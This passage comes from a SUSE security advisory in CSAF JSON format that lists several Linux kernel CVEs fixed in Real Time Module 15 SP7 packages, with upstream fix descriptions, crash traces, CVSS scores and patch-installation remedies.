"category": "external",
"summary": "SUSE Bug 1253443 for CVE-2025-40177",
"url": "https://bugzilla.suse.com/1253443"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40177"
},
{
"cve": "CVE-2025-40181",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40181"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/kvm: Force legacy PCI hole to UC when overriding MTRRs for TDX/SNP\n\nWhen running as an SNP or TDX guest under KVM, force the legacy PCI hole,\ni.e. memory between Top of Lower Usable DRAM and 4GiB, to be mapped as UC\nvia a forced variable MTRR range.\n\nIn most KVM-based setups, legacy devices such as the HPET and TPM are\nenumerated via ACPI. ACPI enumeration includes a Memory32Fixed entry, and\noptionally a SystemMemory descriptor for an OperationRegion, e.g. if the\ndevice needs to be accessed via a Control Method.\n\nIf a SystemMemory entry is present, then the kernel\u0027s ACPI driver will\nauto-ioremap the region so that it can be accessed at will. However, the\nACPI spec doesn\u0027t provide a way to enumerate the memory type of\nSystemMemory regions, i.e. there\u0027s no way to tell software that a region\nmust be mapped as UC vs. WB, etc. As a result, Linux\u0027s ACPI driver always\nmaps SystemMemory regions using ioremap_cache(), i.e. as WB on x86.\n\nThe dedicated device drivers however, e.g. the HPET driver and TPM driver,\nwant to map their associated memory as UC or WC, as accessing PCI devices\nusing WB is unsupported.\n\nOn bare metal and non-CoCO, the conflicting requirements \"work\" as firmware\nconfigures the PCI hole (and other device memory) to be UC in the MTRRs.\nSo even though the ACPI mappings request WB, they are forced to UC- in the\nkernel\u0027s tracking due to the kernel properly handling the MTRR overrides,\nand thus are compatible with the drivers\u0027 requested WC/UC-.\n\nWith force WB MTRRs on SNP and TDX guests, the ACPI mappings get their\nrequested WB if the ACPI mappings are established before the dedicated\ndriver code attempts to initialize the device. E.g. if acpi_init()\nruns before the corresponding device driver is probed, ACPI\u0027s WB mapping\nwill \"win\", and result in the driver\u0027s ioremap() failing because the\nexisting WB mapping isn\u0027t compatible with the requested WC/UC-.\n\nE.g. when a TPM is emulated by the hypervisor (ignoring the security\nimplications of relying on what is allegedly an untrusted entity to store\nmeasurements), the TPM driver will request UC and fail:\n\n [ 1.730459] ioremap error for 0xfed40000-0xfed45000, requested 0x2, got 0x0\n [ 1.732780] tpm_tis MSFT0101:00: probe with driver tpm_tis failed with error -12\n\nNote, the \u00270x2\u0027 and \u00270x0\u0027 values refer to \"enum page_cache_mode\", not x86\u0027s\nmemtypes (which frustratingly are an almost pure inversion; 2 == WB, 0 == UC).\nE.g. tracing mapping requests for TPM TIS yields:\n\n Mapping TPM TIS with req_type = 0\n WARNING: CPU: 22 PID: 1 at arch/x86/mm/pat/memtype.c:530 memtype_reserve+0x2ab/0x460\n Modules linked in:\n CPU: 22 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.16.0-rc7+ #2 VOLUNTARY\n Tainted: [W]=WARN\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/29/2025\n RIP: 0010:memtype_reserve+0x2ab/0x460\n __ioremap_caller+0x16d/0x3d0\n ioremap_cache+0x17/0x30\n x86_acpi_os_ioremap+0xe/0x20\n acpi_os_map_iomem+0x1f3/0x240\n acpi_os_map_memory+0xe/0x20\n acpi_ex_system_memory_space_handler+0x273/0x440\n acpi_ev_address_space_dispatch+0x176/0x4c0\n acpi_ex_access_region+0x2ad/0x530\n acpi_ex_field_datum_io+0xa2/0x4f0\n acpi_ex_extract_from_field+0x296/0x3e0\n acpi_ex_read_data_from_field+0xd1/0x460\n acpi_ex_resolve_node_to_value+0x2ee/0x530\n acpi_ex_resolve_to_value+0x1f2/0x540\n acpi_ds_evaluate_name_path+0x11b/0x190\n acpi_ds_exec_end_op+0x456/0x960\n acpi_ps_parse_loop+0x27a/0xa50\n acpi_ps_parse_aml+0x226/0x600\n acpi_ps_execute_method+0x172/0x3e0\n acpi_ns_evaluate+0x175/0x5f0\n acpi_evaluate_object+0x213/0x490\n acpi_evaluate_integer+0x6d/0x140\n acpi_bus_get_status+0x93/0x150\n acpi_add_single_object+0x43a/0x7c0\n acpi_bus_check_add+0x149/0x3a0\n acpi_bus_check_add_1+0x16/0x30\n acpi_ns_walk_namespace+0x22c/0x360\n acpi_walk_namespace+0x15c/0x170\n acpi_bus_scan+0x1dd/0x200\n acpi_scan_init+0xe5/0x2b0\n acpi_init+0x264/0x5b0\n do_one_i\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40181",
"url": "https://www.suse.com/security/cve/CVE-2025-40181"
},
{
"category": "external",
"summary": "SUSE Bug 1253471 for CVE-2025-40181",
"url": "https://bugzilla.suse.com/1253471"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40181"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix IPsec cleanup over MPV device\n\nWhen we do mlx5e_detach_netdev() we eventually disable blocking events\nnotifier, among those events are IPsec MPV events from IB to core.\n\nSo before disabling those blocking events, make sure to also unregister\nthe devcom device and mark all this device operations as complete,\nin order to prevent the other device from using invalid netdev\nduring future devcom events which could cause the trace below.\n\nBUG: kernel NULL pointer dereference, address: 0000000000000010\nPGD 146427067 P4D 146427067 PUD 146488067 PMD 0\nOops: Oops: 0000 [#1] SMP\nCPU: 1 UID: 0 PID: 7735 Comm: devlink Tainted: GW 6.12.0-rc6_for_upstream_min_debug_2024_11_08_00_46 #1\nTainted: [W]=WARN\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\nRIP: 0010:mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\nCode: 00 01 48 83 05 23 32 1e 00 01 41 b8 ed ff ff ff e9 60 ff ff ff 48 83 05 00 32 1e 00 01 eb e3 66 0f 1f 44 00 00 0f 1f 44 00 00 \u003c48\u003e 8b 47 10 48 83 05 5f 32 1e 00 01 48 8b 50 40 48 85 d2 74 05 40\nRSP: 0018:ffff88811a5c35f8 EFLAGS: 00010206\nRAX: ffff888106e8ab80 RBX: ffff888107d7e200 RCX: ffff88810d6f0a00\nRDX: ffff88810d6f0a00 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff88811a17e620 R08: 0000000000000040 R09: 0000000000000000\nR10: ffff88811a5c3618 R11: 0000000de85d51bd R12: ffff88811a17e600\nR13: ffff88810d6f0a00 R14: 0000000000000000 R15: ffff8881034bda80\nFS: 00007f27bdf89180(0000) GS:ffff88852c880000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000010 CR3: 000000010f159005 CR4: 0000000000372eb0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x20/0x60\n ? page_fault_oops+0x150/0x3e0\n ? exc_page_fault+0x74/0x130\n ? asm_exc_page_fault+0x22/0x30\n ? mlx5_devcom_comp_set_ready+0x5/0x40 [mlx5_core]\n mlx5e_devcom_event_mpv+0x42/0x60 [mlx5_core]\n mlx5_devcom_send_event+0x8c/0x170 [mlx5_core]\n blocking_event+0x17b/0x230 [mlx5_core]\n notifier_call_chain+0x35/0xa0\n blocking_notifier_call_chain+0x3d/0x60\n mlx5_blocking_notifier_call_chain+0x22/0x30 [mlx5_core]\n mlx5_core_mp_event_replay+0x12/0x20 [mlx5_core]\n mlx5_ib_bind_slave_port+0x228/0x2c0 [mlx5_ib]\n mlx5_ib_stage_init_init+0x664/0x9d0 [mlx5_ib]\n ? idr_alloc_cyclic+0x50/0xb0\n ? __kmalloc_cache_noprof+0x167/0x340\n ? __kmalloc_noprof+0x1a7/0x430\n __mlx5_ib_add+0x34/0xd0 [mlx5_ib]\n mlx5r_probe+0xe9/0x310 [mlx5_ib]\n ? kernfs_add_one+0x107/0x150\n ? __mlx5_ib_add+0xd0/0xd0 [mlx5_ib]\n auxiliary_bus_probe+0x3e/0x90\n really_probe+0xc5/0x3a0\n ? driver_probe_device+0x90/0x90\n __driver_probe_device+0x80/0x160\n driver_probe_device+0x1e/0x90\n __device_attach_driver+0x7d/0x100\n bus_for_each_drv+0x80/0xd0\n __device_attach+0xbc/0x1f0\n bus_probe_device+0x86/0xa0\n device_add+0x62d/0x830\n __auxiliary_device_add+0x3b/0xa0\n ? auxiliary_device_init+0x41/0x90\n add_adev+0xd1/0x150 [mlx5_core]\n mlx5_rescan_drivers_locked+0x21c/0x300 [mlx5_core]\n esw_mode_change+0x6c/0xc0 [mlx5_core]\n mlx5_devlink_eswitch_mode_set+0x21e/0x640 [mlx5_core]\n devlink_nl_eswitch_set_doit+0x60/0xe0\n genl_family_rcv_msg_doit+0xd0/0x120\n genl_rcv_msg+0x180/0x2b0\n ? devlink_get_from_attrs_lock+0x170/0x170\n ? devlink_nl_eswitch_get_doit+0x290/0x290\n ? devlink_nl_pre_doit_port_optional+0x50/0x50\n ? genl_family_rcv_msg_dumpit+0xf0/0xf0\n netlink_rcv_skb+0x54/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x1fc/0x2d0\n netlink_sendmsg+0x1e4/0x410\n __sock_sendmsg+0x38/0x60\n ? sockfd_lookup_light+0x12/0x60\n __sys_sendto+0x105/0x160\n ? __sys_recvmsg+0x4e/0x90\n __x64_sys_sendto+0x20/0x30\n do_syscall_64+0x4c/0x100\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\nRIP: 0033:0x7f27bc91b13a\nCode: bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 8b 05 fa 96 2c 00 45 89 c9 4c 63 d1 48 63 ff 85 c0 75 15 b8 2c 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40238",
"url": "https://www.suse.com/security/cve/CVE-2025-40238"
},
{
"category": "external",
"summary": "SUSE Bug 1254871 for CVE-2025-40238",
"url": "https://bugzilla.suse.com/1254871"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-40238"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
